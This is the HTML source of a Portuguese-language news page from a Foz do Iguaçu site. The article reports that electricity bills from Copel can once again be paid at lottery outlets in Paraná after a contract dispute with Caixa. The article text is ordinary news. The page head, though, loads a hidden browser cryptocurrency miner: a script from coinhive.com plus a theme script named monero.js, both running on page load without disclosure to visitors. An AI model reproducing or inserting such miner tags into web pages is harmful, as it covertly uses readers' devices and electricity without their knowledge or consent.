

<!DOCTYPE html>
<html class="no-js" lang="pt-BR">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://oiguassu.com/xmlrpc.php" />
<title>CONTAS DE LUZ VOLTARAM A SER PAGAS EM LOTÉRICAS DO PARANÁ DESDE SÁBADO, 05</title>

	<!-- Meta Tag Manager -->
	<meta http-equiv="pragma" content="no-cache" />
	<!-- / Meta Tag Manager -->
<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//coinhive.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Feed para  &raquo;" href="http://oiguassu.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para  &raquo;" href="http://oiguassu.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para  &raquo; CONTAS DE LUZ VOLTARAM A SER PAGAS EM LOTÉRICAS DO PARANÁ DESDE SÁBADO, 05" href="http://oiguassu.com/contas-de-luz-voltaram-a-ser-pagas-em-lotericas-do-parana-desde-sabado-05/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/oiguassu.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.5"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='mh-style-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/style.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='mh-font-awesome-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/includes/font-awesome.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='mh-google-fonts-css'  href='https://fonts.googleapis.com/css?family=PT+Serif:300,400,400italic,600,700%7cOswald:300,400,400italic,600,700' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack-widget-social-icons-styles-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/modules/widgets/social-icons/social-icons.css?ver=20170506' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/css/jetpack.css?ver=6.1' type='text/css' media='all' />
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js?ver=20150408'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/scripts.js?ver=4.9.5'></script>
<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?ver=4.9.5'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/monero.js?ver=4.9.5'></script>
<link rel='https://api.w.org/' href='http://oiguassu.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://oiguassu.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://oiguassu.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Revoltado: “MINHA FILHA NÃO CONSEGUE DORMIR”, DIZ DELEGADO QUE QUEBROU EQUIPAMENTO DE ACAMPAMENTO PRÓ-LULA' href='http://oiguassu.com/revoltado-minha-filha-nao-consegue-dormir-diz-delegado-que-quebrou-equipamento-de-acampamento-pro-lula/' />
<link rel='next' title='EL FANTASMA DE LA CRISIS VUELVE A ARGENTINA' href='http://oiguassu.com/el-fantasma-de-la-crisis-vuelve-a-argentina/' />
<meta name="generator" content="WordPress 4.9.5" />
<link rel="canonical" href="http://oiguassu.com/contas-de-luz-voltaram-a-ser-pagas-em-lotericas-do-parana-desde-sabado-05/" />
<link rel='shortlink' href='https://wp.me/pS5BS-1Sb' />
<link rel="alternate" type="application/json+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Fcontas-de-luz-voltaram-a-ser-pagas-em-lotericas-do-parana-desde-sabado-05%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Fcontas-de-luz-voltaram-a-ser-pagas-em-lotericas-do-parana-desde-sabado-05%2F&#038;format=xml" />
		<a href="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></a>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9260427313362027",
    enable_page_level_ads: true
  });
</script>

<link rel='dns-prefetch' href='//v0.wordpress.com'/>
<style type='text/css'>img#wpstats{display:none}</style>	<style type="text/css">
    	    		.social-nav a:hover, .logo-title, .entry-content a, a:hover, .entry-meta .entry-meta-author, .entry-meta a, .comment-info, blockquote, .pagination a:hover .pagelink { color: #019100; }
			.main-nav li:hover, .slicknav_menu, .ticker-title, .breadcrumb a, .breadcrumb .bc-text, .button span, .widget-title span, input[type=submit], table th, .comment-section-title .comment-count, #cancel-comment-reply-link:hover, .pagination .current, .pagination .pagelink { background: #019100; }
			blockquote, input[type=text]:hover, input[type=email]:hover, input[type=tel]:hover, input[type=url]:hover, textarea:hover { border-color: #019100; }
    	    	    				.main-nav, .main-nav ul li:hover > ul, .mh-footer { background: #019100; }
    	    	    	    		</style>
    <!--[if lt IE 9]>
<script src="http://oiguassu.com/wp-content/themes/mh_newsdesk/js/css3-mediaqueries.js"></script>
<![endif]-->

<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="CONTAS DE LUZ VOLTARAM A SER PAGAS EM LOTÉRICAS DO PARANÁ DESDE SÁBADO, 05" />
<meta property="og:url" content="http://oiguassu.com/contas-de-luz-voltaram-a-ser-pagas-em-lotericas-do-parana-desde-sabado-05/" />
<meta property="og:description" content="Retomada de recebimento de faturas estava previsto para segunda-feira (7), mas foi antecipada para sábado. Caixa Econômica Federal e Copel estavam sem contrato para o serviço desde 13 de março. As …" />
<meta property="article:published_time" content="2018-05-06T09:24:29+00:00" />
<meta property="article:modified_time" content="2018-05-06T09:24:29+00:00" />
<meta property="og:image" content="http://oiguassu.com/wp-content/uploads/2018/05/tv-em-lotericas-810x398.jpg" />
<meta property="og:image:width" content="810" />
<meta property="og:image:height" content="398" />
<meta property="og:locale" content="pt_BR" />
<meta name="twitter:site" content="@OIguassuDigital" />
<meta name="twitter:text:title" content="CONTAS DE LUZ VOLTARAM A SER PAGAS EM LOTÉRICAS DO PARANÁ DESDE SÁBADO, 05" />
<meta name="twitter:image" content="http://oiguassu.com/wp-content/uploads/2018/05/tv-em-lotericas-810x398.jpg?w=640" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:creator" content="@OIguassuDigital" />

<!-- End Jetpack Open Graph Tags -->
</head>
<body class="post-template-default single single-post postid-7203 single-format-standard mh-right-sb">
<div id="mh-wrapper">
<header class="mh-header">
	<div class="header-wrap clearfix">
				<div class="mh-col mh-1-3 header-logo-full">
			<a href="http://oiguassu.com/" title="" rel="home">
<div class="logo-wrap" role="banner">
<img src="http://oiguassu.com/wp-content/uploads/2017/08/cropped-Sem-Título-1-1.jpg" height="150" width="500" alt="" />
<div class="logo">
</div>
</div>
</a>
		</div>
			</div>
	<div class="header-menu clearfix">
		<nav class="main-nav clearfix">
			<div class="menu-menu-container"><ul id="menu-menu" class="menu"><li id="menu-item-90" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-90"><a href="http://oiguassu.com">Início</a></li>
<li id="menu-item-91" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-91"><a href="http://oiguassu.com/category/foz/">Foz do Iguaçu</a></li>
<li id="menu-item-92" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-92"><a href="http://oiguassu.com/category/parana/">Paraná</a></li>
<li id="menu-item-93" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-93"><a href="http://oiguassu.com/category/brasil/">Brasil</a></li>
<li id="menu-item-94" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-94"><a href="http://oiguassu.com/category/argentina/">Argentina</a></li>
<li id="menu-item-95" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-95"><a href="http://oiguassu.com/category/paraguay/">Paraguay</a></li>
<li id="menu-item-96" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-96"><a href="http://oiguassu.com/category/latinoamerica/">Latinoamerica</a></li>
<li id="menu-item-97" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-97"><a href="http://oiguassu.com/category/colunas/">Colunas</a></li>
</ul></div>		</nav>
		<div class="header-sub clearfix">
							<div id="ticker" class="news-ticker mh-col mh-2-3 clearfix">
			<span class="ticker-title">
			Hot Topics		</span>
		<ul class="ticker-content">			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/el-fantasma-de-la-crisis-vuelve-a-argentina/" title="EL FANTASMA DE LA CRISIS VUELVE A ARGENTINA">
					<span class="ticker-item-date">Maio 6, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">EL FANTASMA DE LA CRISIS VUELVE A ARGENTINA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/contas-de-luz-voltaram-a-ser-pagas-em-lotericas-do-parana-desde-sabado-05/" title="CONTAS DE LUZ VOLTARAM A SER PAGAS EM LOTÉRICAS DO PARANÁ DESDE SÁBADO, 05">
					<span class="ticker-item-date">Maio 6, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">CONTAS DE LUZ VOLTARAM A SER PAGAS EM LOTÉRICAS DO PARANÁ DESDE SÁBADO, 05</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/revoltado-minha-filha-nao-consegue-dormir-diz-delegado-que-quebrou-equipamento-de-acampamento-pro-lula/" title="Revoltado: “MINHA FILHA NÃO CONSEGUE DORMIR”, DIZ DELEGADO QUE QUEBROU EQUIPAMENTO DE ACAMPAMENTO PRÓ-LULA">
					<span class="ticker-item-date">Maio 6, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Revoltado: “MINHA FILHA NÃO CONSEGUE DORMIR”, DIZ DELEGADO QUE QUEBROU EQUIPAMENTO DE ACAMPAMENTO PRÓ-LULA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/privilegio-diferente-de-outros-presos-lula-nao-faz-a-faxina-da-propria-cela/" title="Privilégio: DIFERENTE DE OUTROS PRESOS, LULA NÃO FAZ A FAXINA DA PRÓPRIA CELA">
					<span class="ticker-item-date">Maio 6, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Privilégio: DIFERENTE DE OUTROS PRESOS, LULA NÃO FAZ A FAXINA DA PRÓPRIA CELA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/brasileiro-paramilitar-que-combateu-na-ucrania-e-capturado-por-nacionalistas-em-kiev/" title="BRASILEIRO PARAMILITAR QUE COMBATEU NA UCRÂNIA É CAPTURADO POR NACIONALISTAS EM KIEV">
					<span class="ticker-item-date">Maio 6, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">BRASILEIRO PARAMILITAR QUE COMBATEU NA UCRÂNIA É CAPTURADO POR NACIONALISTAS EM KIEV</span>
				</a>
			</li>	</ul>
</div>						<aside class="mh-col mh-1-3 header-search">
				<form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form>			</aside>
		</div>
	</div>
</header><div class="mh-section mh-group">
	<div id="main-content" class="mh-content"><nav class="breadcrumb"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com" itemprop="url" class="bc-home"><span itemprop="title">Home</span></a></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com/category/parana/" itemprop="url"><span itemprop="title">Paraná</span></a></span></nav>
<article id="post-7203" class="post-7203 post type-post status-publish format-standard has-post-thumbnail hentry category-parana tag-caixa-economica tag-copel tag-foz-do-iguacu tag-parana">
	<header class="entry-header clearfix">
		<h1 class="entry-title">
			CONTAS DE LUZ VOLTARAM A SER PAGAS EM LOTÉRICAS DO PARANÁ DESDE SÁBADO, 05		</h1>
		<div class="entry-tags clearfix"><span>TOPICS:</span><a href="http://oiguassu.com/tag/caixa-economica/" rel="tag">Caixa Econômica</a><a href="http://oiguassu.com/tag/copel/" rel="tag">Copel</a><a href="http://oiguassu.com/tag/foz-do-iguacu/" rel="tag">Foz do Iguaçu</a><a href="http://oiguassu.com/tag/parana/" rel="tag">Paraná</a></div>	</header>
	
<div class="entry-thumbnail">
<img width="777" height="398" src="http://oiguassu.com/wp-content/uploads/2018/05/tv-em-lotericas-810x398-777x398.jpg" class="attachment-content-single size-content-single wp-post-image" alt="" data-attachment-id="7205" data-permalink="http://oiguassu.com/contas-de-luz-voltaram-a-ser-pagas-em-lotericas-do-parana-desde-sabado-05/tv-em-lotericas-810x398/" data-orig-file="http://oiguassu.com/wp-content/uploads/2018/05/tv-em-lotericas-810x398.jpg" data-orig-size="810,398" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="tv-em-lotericas-810&#215;398" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2018/05/tv-em-lotericas-810x398-300x147.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2018/05/tv-em-lotericas-810x398.jpg" /></div>
		<p class="entry-meta">
<span class="entry-meta-author vcard author">Posted By: <a class="fn" href="http://oiguassu.com/author/administrador/">Administrador</a></span>
<span class="entry-meta-date updated">Maio 6, 2018</span>
</p>
	<div class="entry-content clearfix">
		<!--CusAdsVi1--><h3 class="content-head__subtitle" style="text-align: justify;"><strong>Retomada de recebimento de faturas estava previsto para segunda-feira (7), mas foi antecipada para sábado. Caixa Econômica Federal e Copel estavam sem contrato para o serviço desde 13 de março.</strong></h3>
<div class="mc-column content-text active-extra-styles active-capital-letter" style="text-align: justify;" data-block-type="unstyled" data-block-weight="48" data-block-id="2">
<p class="content-text__container theme-color-primary-first-letter" data-track-category="Link no Texto" data-track-links="">As lotéricas voltaram a receber o pagamento das contas de energia neste sábado (5), segundo o Sindicato dos Empresários Lotéricos do Paraná (Sinlopar). O recebimento estava suspenso desde 13 de março, e, segundo o governo estadual, a previsão era retomar o atendimento do serviço somente na segunda-feira (7).</p>
</div>
<div class="mc-column content-text active-extra-styles " style="text-align: justify;" data-block-type="unstyled" data-block-weight="40" data-block-id="4">
<p class="content-text__container " data-track-category="Link no Texto" data-track-links="">Foram quase dois meses com atendimento restrito. Agências da Caixa e lotéricas deixaram de receber as faturas da Companhia Paranaense de Energia Elétrica (Copel). Clientes dependiam de farmácias ou mercados para pagar a conta de luz no dia do vencimento.</p>
</div>
<div class="mc-column content-text active-extra-styles " style="text-align: justify;" data-block-type="unstyled" data-block-weight="39" data-block-id="6">
<p class="content-text__container " data-track-category="Link no Texto" data-track-links="">O impasse começou porque a Caixa queria reajustar em 47% o valor cobrado para receber as contas. Índice considerado exagerado pela Copel. Segundo o governo, as empresas retomaram as negociações em abril e, nesta semana, chegaram a um acordo.</p>
</div>
<div class="mc-column content-text active-extra-styles " style="text-align: justify;" data-block-type="unstyled" data-block-weight="28" data-block-id="7">
<p class="content-text__container " data-track-category="Link no Texto" data-track-links="">Os detalhes do acordo ainda não foram divulgados, mas o Sinlopar garante que o percentual do reajuste do contrato ficou bem abaixo do exigido no início das negociações.</p>
</div>
<div class="mc-column content-text active-extra-styles " style="text-align: justify;" data-block-type="unstyled" data-block-weight="30" data-block-id="8">
<p class="content-text__container " data-track-category="Link no Texto" data-track-links="">&#8220;É uma receita a mais que dará continuidade aos empregos que geramos em todo o estado do Paraná&#8221;, explicou o presidente do Sindicato do Empresários Lotéricos do Paraná, Aldemar Mascarenhas.</p>
</div>
<div class="mc-column content-text active-extra-styles " style="text-align: justify;" data-block-type="unstyled" data-block-weight="37" data-block-id="9">
<p class="content-text__container " data-track-category="Link no Texto" data-track-links="">Segundo o presidente dos empresários do setor, das mais de 4,5 milhões de faturas mensais da Copel, cerca de 1,9 milhão eram recebidas pelas agências da Caixa e Lotéricas. Um volume expressivo de clientes e de dinheiro.</p>
<div class="mc-column content-text active-extra-styles " data-block-type="unstyled" data-block-weight="42" data-block-id="13">
<p class="content-text__container " data-track-category="Link no Texto" data-track-links="">Em relação a retomada do recebimento das contas de luz, a Caixa Econômica Federal se limitou a informar que renovou o convênio com a Copel e que está tudo normalizado. A Copel também reiterou através da assessoria que a situação está regularizada.</p>
</div>
<div class="mc-column content-text active-extra-styles" data-block-type="raw" data-block-weight="2" data-block-id="14">
<div class="content-intertitle">
<h3>Onde Pagar</h3>
</div>
</div>
<div class="mc-column content-text active-extra-styles " data-block-type="unstyled" data-block-weight="35" data-block-id="15">
<p class="content-text__container " data-track-category="Link no Texto" data-track-links="">Além da rede lotérica, a conta de luz pode ser paga em 2.181 pontos de 11 bancos credenciados e em 826 agentes arrecadadores em todo Paraná e Porto União (SC), que inclui farmácias e supermercados.</p>
</div>
<div class="mc-column content-text active-extra-styles " data-block-type="unstyled" data-block-weight="26" data-block-id="16">
<p class="content-text__container " data-track-category="Link no Texto" data-track-links="">A Copel também tem parceria com o Detran, por meio da qual é possível pagar a fatura com cartão de débito em 173 totens do órgão. A lista de toda a rede credenciada para pagamento da fatura de energia pode ser encontrada no site da companhia.</p>
</div>
<div class="mc-column content-text active-extra-styles " data-block-type="unstyled" data-block-weight="30" data-block-id="18">
<p class="content-text__container " data-track-category="Link no Texto" data-track-links="">Os consumidores também podem pagar a fatura de energia elétrica no banco que possuem conta corrente. Além disso, o consumidor pode colocar a fatura em débito automático em conta corrente.</p>
</div>
</div>
<div class="mc-column content-text active-extra-styles " style="text-align: justify;" data-block-type="unstyled" data-block-weight="17" data-block-id="10"></div>
<div class="mc-column content-text active-extra-styles " data-block-type="unstyled" data-block-weight="19" data-block-id="11">
<p class="content-text__container " style="text-align: justify;" data-track-category="Link no Texto" data-track-links="">
</div>
<p data-track-category="Link no Texto" data-track-links="">
<p data-track-category="Link no Texto" data-track-links="">
<h6 style="text-align: right;" data-track-category="Link no Texto">(Com Agência O Globo)</h6>

<div style="font-size: 0px; height: 0px; line-height: 0px; margin: 0; padding: 0; clear: both;"></div><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Compartilhe isso:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow" data-shared="sharing-twitter-7203" class="share-twitter sd-button share-icon no-text" href="http://oiguassu.com/contas-de-luz-voltaram-a-ser-pagas-em-lotericas-do-parana-desde-sabado-05/?share=twitter" target="_blank" title="Clique para compartilhar no Twitter"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Twitter(abre em nova janela)</span></a></li><li class="share-facebook"><a rel="nofollow" data-shared="sharing-facebook-7203" class="share-facebook sd-button share-icon no-text" href="http://oiguassu.com/contas-de-luz-voltaram-a-ser-pagas-em-lotericas-do-parana-desde-sabado-05/?share=facebook" target="_blank" title="Clique para compartilhar no Facebook"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Facebook(abre em nova janela)</span></a></li><li class="share-google-plus-1"><a rel="nofollow" data-shared="sharing-google-7203" class="share-google-plus-1 sd-button share-icon no-text" href="http://oiguassu.com/contas-de-luz-voltaram-a-ser-pagas-em-lotericas-do-parana-desde-sabado-05/?share=google-plus-1" target="_blank" title="Compartilhe no Google+"><span></span><span class="sharing-screen-reader-text">Compartilhe no Google+(abre em nova janela)</span></a></li><li class="share-end"></li></ul></div></div></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Relacionado</em></h3>
</div>	</div>
	</article>		<h4 class="widget-title related-content-title">
			<span>Related Articles</span>
		</h4>
		<div class="related-content clearfix"><article class="mh-col mh-1-4 content-grid post-7123 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized tag-cataratas tag-foz-do-iguacu tag-manchete2 tag-unifoz">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/etapa-do-cicloturismo-sera-em-foz-do-iguacu-no-dia-20-de-maio/" title="ETAPA DO CICLOTURISMO SERÁ EM FOZ DO IGUAÇU NO DIA 20 DE MAIO"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2018/05/CICLISMO-FOZ-OK-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2018/05/CICLISMO-FOZ-OK-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2018/05/CICLISMO-FOZ-OK-777x437.jpg 777w, http://oiguassu.com/wp-content/uploads/2018/05/CICLISMO-FOZ-OK-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2018/05/CICLISMO-FOZ-OK-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2018/05/CICLISMO-FOZ-OK-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="7128" data-permalink="http://oiguassu.com/etapa-do-cicloturismo-sera-em-foz-do-iguacu-no-dia-20-de-maio/ciclismo-foz-ok/" data-orig-file="http://oiguassu.com/wp-content/uploads/2018/05/CICLISMO-FOZ-OK.jpg" data-orig-size="822,549" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="CICLISMO FOZ OK" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2018/05/CICLISMO-FOZ-OK-300x200.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2018/05/CICLISMO-FOZ-OK.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/uncategorized/" rel="category tag">Uncategorized</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/etapa-do-cicloturismo-sera-em-foz-do-iguacu-no-dia-20-de-maio/" title="ETAPA DO CICLOTURISMO SERÁ EM FOZ DO IGUAÇU NO DIA 20 DE MAIO" rel="bookmark">
			ETAPA DO CICLOTURISMO SERÁ EM FOZ DO IGUAÇU NO DIA 20 DE MAIO		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-7154 post type-post status-publish format-standard has-post-thumbnail hentry category-paraguay tag-cudad-del-este tag-foz-do-iguacu tag-paraguai tag-paraguay">
	<div class="content-thumb content-grid-thumb">
		<a href="http://oiguassu.com/frontera-brasil-habilitara-sus-temidos-free-shops-desde-octubre/" title="Frontera: BRASIL HABILITARÁ SUS TEMIDOS FREE SHOPS DESDE OCTUBRE"><img width="180" height="101" src="http://oiguassu.com/wp-content/uploads/2018/04/ponteamizade_naestrada1-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2018/04/ponteamizade_naestrada1-180x101.jpg 180w, http://oiguassu.com/wp-content/uploads/2018/04/ponteamizade_naestrada1-777x437.jpg 777w, http://oiguassu.com/wp-content/uploads/2018/04/ponteamizade_naestrada1-260x146.jpg 260w, http://oiguassu.com/wp-content/uploads/2018/04/ponteamizade_naestrada1-373x210.jpg 373w, http://oiguassu.com/wp-content/uploads/2018/04/ponteamizade_naestrada1-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="6011" data-permalink="http://oiguassu.com/comercio-de-frontera-se-resiente-por-la-depreciacion-del-real-en-el-brasil/ponteamizade_naestrada1/" data-orig-file="http://oiguassu.com/wp-content/uploads/2018/04/ponteamizade_naestrada1.jpg" data-orig-size="1067,720" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;5.6&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;Canon EOS 60D&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1376651167&quot;,&quot;copyright&quot;:&quot;www.flickr.com\/photos\/cesar_camilla&quot;,&quot;focal_length&quot;:&quot;18&quot;,&quot;iso&quot;:&quot;320&quot;,&quot;shutter_speed&quot;:&quot;0.000625&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="ponteamizade_naestrada1" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2018/04/ponteamizade_naestrada1-300x202.jpg" data-large-file="http://oiguassu.com/wp-content/uploads/2018/04/ponteamizade_naestrada1-1024x691.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="http://oiguassu.com/category/paraguay/" rel="category tag">Paraguay</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="http://oiguassu.com/frontera-brasil-habilitara-sus-temidos-free-shops-desde-octubre/" title="Frontera: BRASIL HABILITARÁ SUS TEMIDOS FREE SHOPS DESDE OCTUBRE" rel="bookmark">
			Frontera: BRASIL HABILITARÁ SUS TEMIDOS FREE SHOPS DESDE OCTUBRE		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-7178 post type-post status-publish format-standard has-post-thumbnail hentry category-parana tag-alvaro-dias tag-bolsonaro tag-brasil tag-parana">
	<div class="content-thumb content-grid-thumb">
